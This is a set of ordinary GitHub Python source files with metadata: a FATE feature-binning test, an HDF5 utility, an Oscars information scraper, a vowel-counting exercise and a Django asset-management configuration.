+{"seq_id": "26900030865", "text": "import argparse\n\nimport numpy as np\n\nfrom fate_arch.session import computing_session as session\nfrom fate_arch.computing import ComputingType\nfrom fate_arch.session import Session\nfrom federatedml.feature.homo_feature_binning import homo_split_points\nfrom federatedml.feature.instance import Instance\nfrom federatedml.feature.sparse_vector import SparseVector\nfrom federatedml.util import consts\n\nGUEST = 'guest'\nHOST = 'host'\nARBITER = 'arbiter'\nhost_id_list = ['10000', '10001', '10002']\n\n\nclass TestHomoFeatureBinning():\n def __init__(self, role, own_id):\n self.role = role\n self.party_id = own_id\n self.model_name = 'HomoFeatureBinning'\n self.args = None\n self.table_list = []\n\n def _gen_data(self, data_num, feature_num, partition,\n expect_split_points, is_sparse=False, use_random=False):\n data = []\n shift_iter = 0\n header = [str(i) for i in range(feature_num)]\n bin_num = len(expect_split_points)\n\n for data_key in range(data_num):\n value = expect_split_points[data_key % bin_num]\n if value == expect_split_points[-1]:\n if shift_iter % bin_num == 0:\n value = expect_split_points[0]\n shift_iter += 1\n if not is_sparse:\n if not use_random:\n features = value * np.ones(feature_num)\n else:\n features = np.random.random(feature_num)\n inst = Instance(inst_id=data_key, features=features, label=data_key % 2)\n\n else:\n if not use_random:\n features = value * np.ones(feature_num)\n else:\n features = np.random.random(feature_num)\n data_index = [x for x in range(feature_num)]\n sparse_inst = SparseVector(data_index, data=features, shape=feature_num)\n inst = Instance(inst_id=data_key, features=sparse_inst, label=data_key % 2)\n header = [str(i) for i in range(feature_num)]\n\n data.append((data_key, inst))\n result = session.parallelize(data, include_key=True, partition=partition)\n result.schema = {'header': header}\n self.table_list.append(result)\n return result\n\n def test_homo_split_points(self, is_sparse=False):\n # binning_obj = HomoSplitPointCalculator(role=self.role)\n if self.role == consts.ARBITER:\n binning_obj = homo_split_points.HomoFeatureBinningServer()\n else:\n binning_obj = homo_split_points.HomoFeatureBinningClient()\n\n guest_split_points = (1, 2, 3)\n host_split_points = [(4, 5, 6), (7, 8, 9), (10, 11, 12)]\n expect_agg_sp = [guest_split_points]\n expect_agg_sp.extend(host_split_points)\n expect_agg_sp = np.mean(expect_agg_sp, axis=0)\n if self.role == GUEST:\n data_inst = self._gen_data(1000, 10, 48, expect_split_points=guest_split_points, is_sparse=is_sparse)\n elif self.role == ARBITER:\n data_inst = None\n else:\n host_idx = host_id_list.index(self.party_id)\n data_inst = self._gen_data(1000, 10, 48,\n expect_split_points=host_split_points[host_idx], is_sparse=is_sparse)\n agg_sp = binning_obj.average_run(data_inst, bin_num=3)\n for col_name, col_agg_sp in agg_sp.items():\n # assert np.all(col_agg_sp == expect_agg_sp)\n assert np.linalg.norm(np.array(col_agg_sp) - np.array(expect_agg_sp)) < consts.FLOAT_ZERO\n print(\"is_sparse: {}, split_point detected success\".format(is_sparse))\n\n transferred_table, split_points_result, bin_sparse = binning_obj.convert_feature_to_bin(data_inst, agg_sp)\n if self.role == ARBITER:\n assert transferred_table == split_points_result == bin_sparse is None\n else:\n transferred_data = list(transferred_table.collect())[:10]\n print(\"transferred_data: {}, split_points_result: {}, bin_sparse: {}\".format(\n [x[1].features for x in transferred_data], split_points_result, 
bin_sparse\n ))\n\n return\n\n def test_query_quantiles(self, is_sparse=False):\n if self.role == consts.ARBITER:\n binning_obj = homo_split_points.HomoFeatureBinningServer()\n else:\n binning_obj = homo_split_points.HomoFeatureBinningClient()\n\n guest_split_points = (1, 2, 3)\n host_split_points = [(4, 5, 6), (7, 8, 9), (10, 11, 12)]\n\n if self.role == GUEST:\n data_inst = self._gen_data(1000, 10, 16, expect_split_points=guest_split_points,\n is_sparse=is_sparse, use_random=True)\n elif self.role == ARBITER:\n data_inst = None\n else:\n host_idx = host_id_list.index(self.party_id)\n data_inst = self._gen_data(1000, 10, 16,\n expect_split_points=host_split_points[host_idx],\n is_sparse=is_sparse,\n use_random=True)\n query_points = binning_obj.query_quantile_points(data_inst, 0.2)\n print(query_points)\n\n def tearDown(self):\n for table in self.table_list:\n table.destroy()\n print(\"Finish testing\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-r', '--role', required=False, type=str, help=\"role\",\n choices=(GUEST, HOST, ARBITER), default=GUEST)\n parser.add_argument('-pid', '--pid', required=True, type=str, help=\"own party id\")\n parser.add_argument('-j', '--job_id', required=True, type=str, help=\"job_id\")\n\n args = parser.parse_args()\n job_id = args.job_id\n own_party_id = args.pid\n role = args.role\n print(\"args: {}\".format(args))\n\n with Session() as session:\n session.init_computing(job_id, computing_type=ComputingType.STANDALONE)\n session.init_federation(job_id,\n runtime_conf={\"local\": {\n \"role\": role,\n \"party_id\": own_party_id\n },\n \"role\": {\n \"host\": [str(x) for x in host_id_list],\n \"guest\": [\n '9999'\n ],\n \"arbiter\": ['9998']\n }\n })\n\n test_obj = TestHomoFeatureBinning(role, own_party_id)\n # homo_obj.test_homo_lr()\n test_obj.test_query_quantiles()\n # test_obj.test_homo_split_points()\n # test_obj.test_homo_split_points(is_sparse=True)\n test_obj.tearDown()\n", "repo_name": "FederatedAI/FATE", "sub_path": "python/federatedml/feature/binning/test/test_quantile_binning_module/homo_feature_binning_test.py", "file_name": "homo_feature_binning_test.py", "file_ext": "py", "file_size_in_byte": 6914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5296, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.ones", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 44, "usage_type": "attribute"}, {"api_name": "federatedml.feature.instance.Instance", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 51, "usage_type": "attribute"}, {"api_name": "federatedml.feature.sparse_vector.SparseVector", "line_number": 53, "usage_type": "call"}, {"api_name": "federatedml.feature.instance.Instance", "line_number": 54, "usage_type": "call"}, {"api_name": "fate_arch.session.computing_session.parallelize", "line_number": 58, "usage_type": "call"}, {"api_name": "fate_arch.session.computing_session", "line_number": 58, "usage_type": "name"}, {"api_name": "federatedml.util.consts.ARBITER", "line_number": 65, "usage_type": "attribute"}, {"api_name": "federatedml.util.consts", "line_number": 65, "usage_type": "name"}, {"api_name": 
"federatedml.feature.homo_feature_binning.homo_split_points.HomoFeatureBinningServer", "line_number": 66, "usage_type": "call"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points", "line_number": 66, "usage_type": "name"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points.HomoFeatureBinningClient", "line_number": 68, "usage_type": "call"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points", "line_number": 68, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 86, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 86, "usage_type": "call"}, {"api_name": "federatedml.util.consts.FLOAT_ZERO", "line_number": 86, "usage_type": "attribute"}, {"api_name": "federatedml.util.consts", "line_number": 86, "usage_type": "name"}, {"api_name": "federatedml.util.consts.ARBITER", "line_number": 101, "usage_type": "attribute"}, {"api_name": "federatedml.util.consts", "line_number": 101, "usage_type": "name"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points.HomoFeatureBinningServer", "line_number": 102, "usage_type": "call"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points", "line_number": 102, "usage_type": "name"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points.HomoFeatureBinningClient", "line_number": 104, "usage_type": "call"}, {"api_name": "federatedml.feature.homo_feature_binning.homo_split_points", "line_number": 104, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 130, "usage_type": "call"}, {"api_name": "fate_arch.session.Session", "line_number": 143, "usage_type": "call"}, {"api_name": "fate_arch.session.computing_session", "line_number": 143, "usage_type": "name"}, {"api_name": "fate_arch.session.computing_session.init_computing", "line_number": 144, "usage_type": "call"}, {"api_name": "fate_arch.session.computing_session", "line_number": 144, "usage_type": "name"}, {"api_name": "fate_arch.computing.ComputingType.STANDALONE", "line_number": 144, "usage_type": "attribute"}, {"api_name": "fate_arch.computing.ComputingType", "line_number": 144, "usage_type": "name"}, {"api_name": "fate_arch.session.computing_session.init_federation", "line_number": 145, "usage_type": "call"}, {"api_name": "fate_arch.session.computing_session", "line_number": 145, "usage_type": "name"}]}
+{"seq_id": "3411892478", "text": "import numpy as np\nimport h5py as h5\nfrom typing import Optional, Union, Any\n\nINT_PREFIX = \"packed_int_\"\nFLOAT_PREFIX = \"packed_float_\"\n\n\ndef pack_key(k):\n if isinstance(k, int):\n return \"%s%i\" % (INT_PREFIX, k)\n elif isinstance(k, float):\n return \"%s%f\" % (FLOAT_PREFIX, k)\n else:\n return k\n\n\ndef unpack_key(k):\n if isinstance(k, str):\n if k.startswith(INT_PREFIX):\n return int(k[len(INT_PREFIX) :])\n if k.startswith(FLOAT_PREFIX):\n return float(k[len(FLOAT_PREFIX) :])\n return k\n else:\n return k\n\n\ndef pack_dataset(\n h5_file: Union[h5.File, h5.Group],\n data_dict: dict[Any, Any],\n compression: Optional[str] = None,\n):\n \"\"\"Takes data organized in a python dict, and stores it in the given hdf5\n with the same structure. Keys are converted to strings to comply to hdf5\n group naming convention. In `unpack_hdf`, if the key is prefixed as a packed\n number, it will be converted back from string.\"\"\"\n\n def rec(data, grp):\n for k, v in data.items():\n k = pack_key(k)\n\n if type(v) is dict:\n if k in grp:\n rec(v, grp[k])\n else:\n rec(v, grp.create_group(k))\n elif isinstance(v, (float, int, str, np.integer)): # type: ignore\n grp.create_dataset(k, data=v) # can't compress scalars\n elif v is not None:\n grp.create_dataset(k, data=v, compression=compression)\n\n rec(data_dict, h5_file)\n\n\ndef pack_hdf(pth, data_dict, compression: Optional[str] = None):\n \"\"\"Takes data organized in a python dict, and creates an hdf5 with the\n same structure. Keys are converted to strings to comply to hdf5 group naming\n convention. In `unpack_hdf`, if the key is all digits, it will be converted\n back from string.\"\"\"\n with h5.File(pth + \".h5\", \"w\") as pckg:\n pack_dataset(pckg, data_dict, compression=compression)\n\n\ndef unpack_hdf_rec(group):\n \"\"\"Recursively unpack an hdf5 of nested Groups (and Datasets) to dict.\"\"\"\n return {\n unpack_key(k): v[()] if type(v) is h5.Dataset else unpack_hdf(v)\n for k, v in group.items()\n }\n\n\ndef unpack_hdf(h5_group):\n \"\"\"Unpack an hdf5 of nested Groups (and Datasets) to dict.\"\"\"\n d = {}\n items = [list(h5_group.items())]\n grps = [d]\n while True:\n if len(items) > 0 and len(items[-1]) > 0:\n k, v = items[-1].pop()\n k = unpack_key(k)\n if type(v) is h5.Dataset:\n grps[-1][k] = v[()]\n else:\n grps[-1][k] = {}\n grps.append(grps[-1][k])\n items.append(list(v.items()))\n elif len(items) > 0:\n items.pop()\n grps.pop()\n else:\n break\n return d\n\n\nclass Workspace:\n _data: Union[dict, h5.File]\n\n def __init__(self, data: Union[dict, h5.File], read_only=False):\n self.read_only = read_only\n self._data = data\n self.is_hdf = not (data is dict)\n\n def __setitem__(self, key, item):\n if self.read_only:\n raise ValueError(\"Workspace is read-only.\")\n\n key = pack_key(key) if self.is_hdf else key\n if self.is_hdf and key in self._data:\n try:\n self._data[key][...] 
= item # type:ignore\n except TypeError: # if new item has a different shape\n del self._data[key]\n self._data[key] = item\n elif self.is_hdf and type(item) is dict:\n if key in self._data:\n del self._data[key]\n pack_dataset(self._data, {key: item}) # type:ignore\n else:\n self._data[key] = item\n\n def __getitem__(self, key):\n if self.is_hdf:\n v = self._data[pack_key(key)]\n if type(v) is h5.Group:\n return Workspace(v, read_only=self.read_only) # type:ignore\n elif type(v) is h5.Dataset and v.shape == ():\n return v[()]\n else:\n return v\n else:\n return self._data[key]\n\n def __repr__(self):\n return repr(self._data)\n\n def __len__(self):\n return len(self._data)\n\n def __delitem__(self, key):\n if self.read_only:\n raise ValueError(\"Workspace is read-only.\")\n\n key = pack_key(key) if self.is_hdf else key\n del self._data[key]\n\n def __contains__(self, k):\n k = pack_key(k) if self.is_hdf else k\n return k in self._data\n\n def __iter__(self):\n return iter(self._data)\n\n def has_key(self, k):\n k = pack_key(k) if self.is_hdf else k\n return k in self._data\n\n def keys(self):\n if self.is_hdf:\n return map(unpack_key, self._data.keys())\n else:\n return self._data.keys()\n\n def values(self):\n return self._data.values()\n\n def items(self):\n if self.is_hdf:\n return map(lambda kv: (unpack_key(kv[0]), kv[1]), self._data.items())\n else:\n return self._data.items()\n\n def create_group(self, key):\n if self.read_only:\n raise ValueError(\"Workspace is read-only.\")\n\n if self.is_hdf:\n if key in self._data:\n del self._data[key]\n return self._data.create_group(key) # type:ignore\n else:\n self._data[key] = {}\n return self._data[key]\n\n def close(self):\n if self.is_hdf:\n self._data.close() # type:ignore\n else:\n print(\"Workspace is backed by a dict, nothing to close.\")\n", "repo_name": "geoffder/ei-balance", "sub_path": "hdf_utils.py", "file_name": "hdf_utils.py", "file_ext": "py", "file_size_in_byte": 5618, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.Union", "line_number": 30, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 30, "usage_type": "attribute"}, {"api_name": "h5py.Group", "line_number": 30, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.integer", "line_number": 48, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 56, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 61, "usage_type": "call"}, {"api_name": "h5py.Dataset", "line_number": 68, "usage_type": "attribute"}, {"api_name": "h5py.Dataset", "line_number": 82, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 97, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 97, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 99, "usage_type": "name"}, {"api_name": "h5py.File", "line_number": 99, "usage_type": "attribute"}, {"api_name": "h5py.Group", "line_number": 125, "usage_type": "attribute"}, {"api_name": "h5py.Dataset", "line_number": 127, "usage_type": "attribute"}]}
+{"seq_id": "22738283446", "text": "#!/usr/bin/env python3 \nimport sys\nimport argparse\nimport subprocess\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport imdb\nimport data\nfrom tabulate import tabulate\nimport pdfkit as pdf\nimport wiki\n\ndef recibeConfig():\n parser = argparse.ArgumentParser(description=''' \n \n 1) Print information regarding any actress, actor or director that \n has been either nominated to or has won an Oscar since 1927 complete, typing name + category (eg. 'Uma Thurman' actress)\n \n 2) Use --year in case you want to check nominees and winners of an specific year (eg, --year=1987)\n\n 3) Use --movie if you wan't to check specific information regading a movie (eg, --movie='The Theory of Everything').\n ''')\n group = parser.add_argument_group('Check a name')\n group.add_argument('Name',\n nargs = '?',\n help='Name of the actor, actress or director',\n #metavar='nombre',\n type = str\n # default=\"\"\n )\n group.add_argument('Category',\n nargs = '?',\n help='director | actor | actress',\n #metavar='categoria',\n type = str\n # default=\"\"\n )\n parser.add_argument('--year',\n nargs='?',\n help='''Select a year to see the complete list of Oscar nominees and winners in categories\n including Best Actress/Actor in leading role, Best Actress/Actor in a \n supporting role and Best Picture''',\n #metavar='anyo',\n type = int\n # default=\"\"\n )\n parser.add_argument('--movie',\n nargs='?',\n help='''Select a movie to see the complete list of Oscar nominees and winners in categories\n including Best Actress/Actor in leading role, Best Actress/Actor in a \n supporting role and Best Picture''',\n #metavar='movie',\n type = str\n # default=\"\"\n )\n \n args = parser.parse_args()\n print(args)\n return args\n\n\n\ndef main():\n # PASO 1 - Recibir flags y estandarizarlos en un dict\n config = recibeConfig()\n df = pd.read_csv('../input/df.csv')\n if config.year is None and config.movie is None:\n if len(df[(df['name'] == config.Name)]) > 0:\n print('\\n')\n urlW = wiki.urlWiki(config.Name)\n soupW = imdb.createSoup(urlW)\n wiki.infoGeneral(soupW)\n print('\\n')\n url = imdb.urlImdb(config.Name)\n soup = imdb.createSoup(url)\n print(imdb.numPeliculas(soup, config.Category))\n print('\\n')\n print(data.resumenPremios(df, config.Name))\n print('\\n')\n pdtabulate=lambda df:tabulate(df,headers='keys',tablefmt='psql')\n print(pdtabulate(data.tablaPremios(df, config.Name)))\n print('\\n')\n print(\" You'll find further information in /output/name\")\n print('\\n\\n\\n')\n dfFilm = imdb.dfFilmografia(soup,config.Category)\n imdb.chartFilmografia(dfFilm)\n else:\n print('\\n\\n{} has not been nominated yet :____(\\n\\nTRY ANOTHER NAME\\n\\n'.format(config.Name))\n \n if config.year is not None:\n if len(df[(df['year_ceremony'] == config.year)]) > 0:\n pd.set_option('display.max_rows', 500)\n pd.set_option('display.max_columns', 500)\n pd.set_option('display.width', 1000)\n # with pd.option_context('display.max_rows', None, 'display.max_columns', None):\n print(data.resumenYear(df, config.year))\n print('\\n')\n print(\" You'll find further information in /outpu/year\")\n pdf.from_file('../input/resumenYear.html', '../output/year/resumenYear.pdf') \n else:\n print('\\n\\n{} is out of range.\\n\\nPlase select a year from 1927 to 2019\\n\\n'.format(config.year))\n\n if config.movie is not None:\n if len(df[(df['film'] == config.movie)]) > 0:\n print('\\n')\n print('The 
Oscars information:')\n            print('\\n')\n            print(data.resumenPelicula(df, config.movie))\n            print('\\n')\n            urlPeli = imdb.urlImdb(config.movie)\n            soupPeli = imdb.createSoup(urlPeli)\n            imdb.infoPelicula(soupPeli)\n            print(\" You'll find further information in /output/movie\")\n            print('\\n')\n            pdf.from_file('../input/resumenPelicula.html', '../output/movie/resumenPelicula.pdf') \n        else:\n            print('\\n\\n{} is not among the nominated films.\\n\\nTRY ANOTHER FILM\\n\\n'.format(config.movie))\n\nif __name__==\"__main__\":\n    main()\n\n\n", "repo_name": "mariaadradosr/The-Oscars", "sub_path": "src/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "wiki.urlWiki", "line_number": 75, "usage_type": "call"}, {"api_name": "imdb.createSoup", "line_number": 76, "usage_type": "call"}, {"api_name": "wiki.infoGeneral", "line_number": 77, "usage_type": "call"}, {"api_name": "imdb.urlImdb", "line_number": 79, "usage_type": "call"}, {"api_name": "imdb.createSoup", "line_number": 80, "usage_type": "call"}, {"api_name": "imdb.numPeliculas", "line_number": 81, "usage_type": "call"}, {"api_name": "data.resumenPremios", "line_number": 83, "usage_type": "call"}, {"api_name": "tabulate.tabulate", "line_number": 85, "usage_type": "call"}, {"api_name": "data.tablaPremios", "line_number": 86, "usage_type": "call"}, {"api_name": "imdb.dfFilmografia", "line_number": 90, "usage_type": "call"}, {"api_name": "imdb.chartFilmografia", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 97, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 98, "usage_type": "call"}, {"api_name": "pandas.set_option", "line_number": 99, "usage_type": "call"}, {"api_name": "data.resumenYear", "line_number": 101, "usage_type": "call"}, {"api_name": "pdfkit.from_file", "line_number": 104, "usage_type": "call"}, {"api_name": "data.resumenPelicula", "line_number": 113, "usage_type": "call"}, {"api_name": "imdb.urlImdb", "line_number": 115, "usage_type": "call"}, {"api_name": "imdb.createSoup", "line_number": 116, "usage_type": "call"}, {"api_name": "imdb.infoPelicula", "line_number": 117, "usage_type": "call"}, {"api_name": "pdfkit.from_file", "line_number": 120, "usage_type": "call"}]}
+{"seq_id": "17986204878", "text": "from curses.ascii import isalpha\r\n\r\ndef countWordInLine(line):\r\n vowels = ('a','e','i','o','u')\r\n vowel,consonant = 0,0\r\n line = line.lower()\r\n for ch in line:\r\n if isalpha(ch) and (ch in vowels):\r\n vowel +=1\r\n elif isalpha(ch) and (ch not in vowels):\r\n consonant +=1\r\n return vowel,consonant\r\n\r\ndef findNonDuplicateWord(filename):\r\n vowel,consonant = 0,0\r\n fileobj = open(filename,'r')\r\n for line in fileobj:\r\n x,y = countWordInLine(line)\r\n vowel +=x\r\n consonant +=y\r\n\r\n return vowel,consonant\r\n\r\ndef main():\r\n filename = input(\"Enter filename : \").strip()\r\n consonants,vowels = findNonDuplicateWord(filename)\r\n print(f'No. of vowels in file : {vowels}')\r\n print(f'No. of consonants in file : {consonants}')\r\n\r\nmain()\r\n\r\n\r\n\r\n", "repo_name": "Yuyi-hao/python-book-solution-", "sub_path": "chapter 14/q11.py", "file_name": "q11.py", "file_ext": "py", "file_size_in_byte": 823, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "curses.ascii.isalpha", "line_number": 8, "usage_type": "call"}, {"api_name": "curses.ascii.isalpha", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "71420236008", "text": "from utils.dataService import BaseDataService\nfrom web import models\n\n\nclass ServiceAsset(BaseDataService):\n def __init__(self):\n super().__init__()\n\n self.mainData = models.Asset\n self.condition_config = [\n {\n \"name\": \"cabinet_num\",\n \"caption\": \"机柜号\",\n \"input_type\": \"input\",\n },\n {\n \"name\": \"device_type\",\n \"caption\": \"设备类型\",\n \"input_type\": \"select\",\n \"select_dict\": \"device_type_list\",\n },\n {\n \"name\": \"business_unit\",\n \"caption\": \"业务线\",\n \"input_type\": \"select\",\n \"select_dict\": \"business_unit_list\",\n },\n {\n \"name\": \"idc\",\n \"caption\": \"机房\",\n \"input_type\": \"select\",\n \"select_dict\": \"idc_list\",\n },\n {\n \"name\": \"cabinet_order\",\n \"caption\": \"机柜中序号\",\n \"input_type\": \"input\",\n \"select_dict\": \"\",\n },\n {\n \"name\": \"employee\",\n \"caption\": \"员工\",\n \"input_type\": \"select\",\n \"select_dict\": \"employee_list\",\n },\n {\n \"name\": \"user\",\n \"caption\": \"用户\",\n \"input_type\": \"select\",\n \"select_dict\": \"user_list\",\n },\n {\n \"name\": \"device_status_id\",\n \"caption\": \"设备状态\",\n \"input_type\": \"select\",\n \"select_dict\": \"device_status_list\",\n }\n ]\n self.table_config = [\n {\n \"colname\": \"id\",\n \"caption\": \"Id\",\n \"display\": {\"grid\": 0, \"new\": 0, \"detail\": 0},\n \"edit\": {},\n \"text\": {},\n \"attr\": {},\n \"group\": \"基础信息\",\n },\n {\n \"colname\": \"device_type_id\",\n \"caption\": \"设备类型\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 0, \"type\": \"select\", \"dict\": \"device_type_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@device_type_list\"}, \"align\": \"left\", \"remark\": [\"设备简单分类\", \"不同的设备管理不同\"],},\n \"attr\": {\"kkk\": \"vvv\"},\n \"group\": \"\",\n },\n {\n \"colname\": \"business_unit_id\",\n \"caption\": \"业务线\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"select\", \"dict\": \"business_unit_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@business_unit_list\"}, \"align\": \"left\", \"remark\": [\"公司主业分类\", \"主要用于资源调度\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"idc_id\",\n \"caption\": \"机房\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"select\", \"dict\": \"idc_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@idc_list\"}, \"align\": \"left\", \"remark\": [\"设备当前所在机房\", \"物理位置\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"cabinet_num\",\n \"caption\": \"机柜号\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"input\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@cabinet_num\"}, \"align\": \"center\", \"remark\": [\"机房机柜\", \"机柜的编号\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"cabinet_order\",\n \"caption\": \"机柜中序号\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"input\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@cabinet_order\"}, \"align\": \"center\", \"remark\": [\"机柜中的序号\", \"\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"employee_id\",\n \"caption\": \"员工\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"select\", \"dict\": \"employee_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": 
\"@@employee_list\"}, \"align\": \"left\", \"remark\": [\"当前使用方\", \"\"],},\n \"attr\": {},\n \"group\": \"其他信息\",\n },\n {\n \"colname\": \"user_id\",\n \"caption\": \"用户\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"select\", \"dict\": \"user_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@user_list\"}, \"align\": \"left\", \"remark\": [\"运维登记方\", \"\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"remark\",\n \"caption\": \"备注\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"input\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@remark\"}, \"align\": \"left\", \"remark\": [\"\", \"\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": \"device_status_id\",\n \"caption\": \"设备状态\",\n \"display\": {\"grid\": 1, \"new\": 1, \"detail\": 1},\n \"edit\": {\"enable\": 1, \"type\": \"select\", \"dict\": \"device_status_list\", },\n \"text\": {\"content\": \"{m}\", \"kwargs\": {\"m\": \"@@device_status_list\"}, \"align\": \"center\", \"remark\": [\"设备的当前状态\", \"\"],},\n \"attr\": {},\n \"group\": \"\",\n },\n {\n \"colname\": None,\n \"caption\": \"操作\",\n \"display\": {\"grid\": 1, \"new\": 0, \"detail\": 0},\n \"edit\": {\"enable\": 0, },\n \"text\": {\"content\": \"查看详情 \", \"kwargs\": {\"m\": \"@id\"}, \"align\": \"center\",},\n \"attr\": {},\n \"group\": \"\",\n }\n ]\n self.page_config = {\n \"jsonUrl\": \"asset-json\",\n \"newUrl\": \"asset-new\",\n \"onClick\": \"1\"\n }\n\n # 初始化数据字典\n self.global_dict = {}\n self.global_dict[\"device_status_list\"] = {1: \"上架\", 2: \"上线\", 3: \"离线\", 4: \"下架\", }\n dict_rs = list(models.AssetType.objects.values(\"id\", \"name\"))\n self.global_dict[\"device_type_list\"] = dict(zip([item[\"id\"] for item in dict_rs], [item[\"name\"] for item in dict_rs]))\n dict_rs = list(models.BusinessUnit.objects.values(\"id\", \"name\"))\n self.global_dict[\"business_unit_list\"] = dict(zip([item[\"id\"] for item in dict_rs], [item[\"name\"] for item in dict_rs]))\n dict_rs = list(models.Idc.objects.values(\"id\", \"name\", \"floor\"))\n self.global_dict[\"idc_list\"] = dict(zip([item[\"id\"] for item in dict_rs], [str(item[\"floor\"]) + \"楼-\" + item[\"name\"] for item in dict_rs]))\n dict_rs = list(models.EmployeeInfo.objects.values(\"id\", \"name\"))\n self.global_dict[\"employee_list\"] = dict(zip([item[\"id\"] for item in dict_rs], [item[\"name\"] for item in dict_rs]))\n dict_rs = list(models.UserInfo.objects.values(\"id\", \"username\"))\n self.global_dict[\"user_list\"] = dict(zip([item[\"id\"] for item in dict_rs], [item[\"username\"] for item in dict_rs]))\n", "repo_name": "wildmanwang/exerSite", "sub_path": "exerCmdb/web/services/asset.py", "file_name": "asset.py", "file_ext": "py", "file_size_in_byte": 8436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.dataService.BaseDataService", "line_number": 5, "usage_type": "name"}, {"api_name": "web.models.Asset", "line_number": 9, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 9, "usage_type": "name"}, {"api_name": "web.models.AssetType.objects.values", "line_number": 169, "usage_type": "call"}, {"api_name": "web.models.AssetType", "line_number": 169, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 169, "usage_type": "name"}, {"api_name": "web.models.BusinessUnit.objects.values", "line_number": 171, 
"usage_type": "call"}, {"api_name": "web.models.BusinessUnit", "line_number": 171, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 171, "usage_type": "name"}, {"api_name": "web.models.Idc.objects.values", "line_number": 173, "usage_type": "call"}, {"api_name": "web.models.Idc", "line_number": 173, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 173, "usage_type": "name"}, {"api_name": "web.models.EmployeeInfo.objects.values", "line_number": 175, "usage_type": "call"}, {"api_name": "web.models.EmployeeInfo", "line_number": 175, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 175, "usage_type": "name"}, {"api_name": "web.models.UserInfo.objects.values", "line_number": 177, "usage_type": "call"}, {"api_name": "web.models.UserInfo", "line_number": 177, "usage_type": "attribute"}, {"api_name": "web.models", "line_number": 177, "usage_type": "name"}]}
